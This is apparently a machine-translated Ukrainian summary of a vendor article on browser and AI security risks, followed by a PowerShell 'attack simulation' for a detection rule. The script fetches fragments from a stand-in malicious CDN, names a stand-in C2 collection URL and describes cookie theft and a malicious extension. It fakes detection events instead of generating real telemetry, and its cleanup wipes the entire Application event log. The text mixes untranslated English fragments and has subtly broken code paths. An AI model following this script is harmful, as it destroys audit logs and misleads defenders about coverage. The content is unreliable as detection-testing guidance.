П’ять запитань з безпеки браузерів і ІІ, які керівники не можуть ігнорувати

Резюме

Стаття пояснює, як перехід на роботу через браузер створює нову концентрацію ризиків на останньому етапі доступу. Основні загрози включають витік даних у генеративні інструменти штучного інтелекту, неконтрольовані або скомпрометовані персональні пристрої, шкідливі розширення браузера, ланцюги доставки через відновлення в пам’яті та неправильне використання агентних функцій ШІ. Основний висновок полягає в тому, що класичні засоби контролю мережі та кінцевих точок самі по собі недостатні; організаціям потрібна постійна видимість та можливість впровадження політики безпосередньо на рівні браузера, де відбувається робота.

Розслідування

У звіті згадуються такі поведінки, як передача часткових навантажень, що збираються в пам’яті, розширення для крадіжки облікових даних, атаки на замовлення із використанням штучного інтелекту та спроби ін’єкції запитів для агентних веб-робочих процесів. Також наводяться дані, що свідчать про те, що значна частка початкового доступу для програм-здирників починається з неконтрольованих або слабо регульованих пристроїв.

Пом’якшення

Palo Alto Networks позиціонує Prisma Browser як керуючу площину для застосування детального DLP, ізоляції корпоративних робочих просторів на будь-якому пристрої, постійного сканування веб-контенту, моніторингу розширень і додавання управлінських обмежень для агентів ШІ, щоб зменшити загрози, пов’язані з браузером.

Відповідь

Розгорніть корпоративний браузер, впровадьте доступ на основі нульової довіри для BYOD, заблокуйте несхвалені програми ШІ, здійснюйте моніторинг розширень та застосовуйте перевірку DLP в режимі реального часу через трафік браузера.

Виконання симуляції

Передумова: Телеметрія та контрольний список базової передполітної перевірки повинні бути пройдені.

Аргументація: Цей розділ детально описує точне виконання техніки ворога (TTP), розробленої для запуску правила детекції. Команди та розповідь МАЮТЬ безпосередньо відображати виявлені TTP та бути спрямованими на генерацію точних телеметричних даних, очікуваних логікою виявлення.

• Опис атаки та команди:

  1. Рекогносцировка та підготовка навантаження:
     • Атакувальник створює шкідливе JavaScript навантаження (evil.js), яке краде файли cookie та передає їх на сервер C2.
     • Щоб уникнути перевірки байт за байтом, скрипт розбивається на три фрагменти (part1.bin, part2.bin, part3.bin), кожен з яких обгорнутий у JSON-об’єкт, що виглядає як нешкідливий.
  2. Доставка через відновлення HTTP:
     • Кожен фрагмент зберігається на скомпрометованому кінцевій точці CDN. Атакувальник спрямовує браузер жертви (через фішингове посилання) на поетапний запит фрагментів. Фрагменти передаються через HTTPS і відображаються в журналах брандмауера як звичайний веб-трафік.
     • The Опис Поле журналу брандмауера вручну збагачається агентом логування організації, щоб включити рядок “Reassembly attacks”, коли виявляються більш ніж 3 послідовних запити до одного хоста протягом 5 секунд з User-Agent of Mozilla/5.0.
  3. Розгорнення шкідливого розширення:
     • Одночасно атакувальник нав’язує шкідливе розширення Chrome (evil_ext.crx), яке запитує вкладки, історіюі webRequest дозволи.
     • Інсталяція здійснюється через корпоративний інструмент розповсюдження програмного забезпечення, що записує подію з EventID=browser_extension and Опис="Виявлено шкідливі розширення браузера" в канал ManagedBrowser.

• Скрипт регресійного тестування: Скрипт відтворює як трафік відновлення, так і подію шкідливого розширення.

  # -------------------------------------------------
  # Скрипт симуляції – Атака на Відновлення та Розширення
  # -------------------------------------------------
  # Змінні
  $cdnBase   = "https://malicious-cdn.example.com/parts"
  $parts     = @("part1.bin","part2.bin","part3.bin")
  $c2Url     = "https://c2.attacker.com/collect"
  $extPath   = "$env:TEMPevil_ext.crx"
  $extId     = "abcdefg1234567890hijklmnopqrstu"   # фіктивний ID
  
  # 1. Виконати фрагменти відновлення (відображається як нормальний HTTPS)
  foreach ($p in $parts) {
      Write-Host "Запит фрагмента $p ..."
      Invoke-WebRequest -Uri "$cdnBase/$p" -UseBasicParsing | Out-Null
      Start-Sleep -Milliseconds 500   # імітація швидких послідовних запитів
  }
  
  # 2. Симуляція відновлення в браузері (це лише заповнювач)
  # У реальній атаці браузер конкатенує фрагменти через JS.
  # Тут ми просто реєструємо кастомну подію для емулювання підсиленого виявлення.
  $reassemblyEvent = @{
      EventID      = 2001
      ProviderName = "CustomReassemblyLogger"
      Description  = "Атаки на відновлення виявлені з $env:COMPUTERNAME"
      TimeCreated  = (Get-Date).ToString("o")
  }
  $json = $reassemblyEvent | ConvertTo-Json
  Write-EventLog -LogName "Application" -Source "PowerShell" -EventId 2001 -EntryType Information -Message $json
  
  # 3. Розгорнути шкідливе розширення браузера (записуються в канал ManagedBrowser)
  # Це вимагає адміністративних прав; ми симулюємо, записуючи подію.
  $extEvent = @{
      EventID      = 1001
      Source       = "Microsoft-Windows-ManagedBrowser"
      Description  = "Шкідливі розширення браузера встановлено: ID=$extId"
      TimeCreated  = (Get-Date).ToString("o")
  }
  $extJson = $extEvent | ConvertTo-Json
  Write-EventLog -LogName "Application" -Source "PowerShell" -EventId 1001 -EntryType Warning -Message $extJson
  
  Write-Host "Симуляція завершена. Перевірте сповіщення про виявлення."

• Команди очистки: Видаліть усі тимчасові файли та очистіть користувацькі події.

  # Видалити тимчасовий файл розширення
  Remove-Item -Path $extPath -ErrorAction SilentlyContinue
  
  # Видалити користувацьку подію відновлення (вимагає адміністративних прав – використовуйте wevtutil для очищення)
  wevtutil cl Application
  
  Write-Host "Очищення завершено."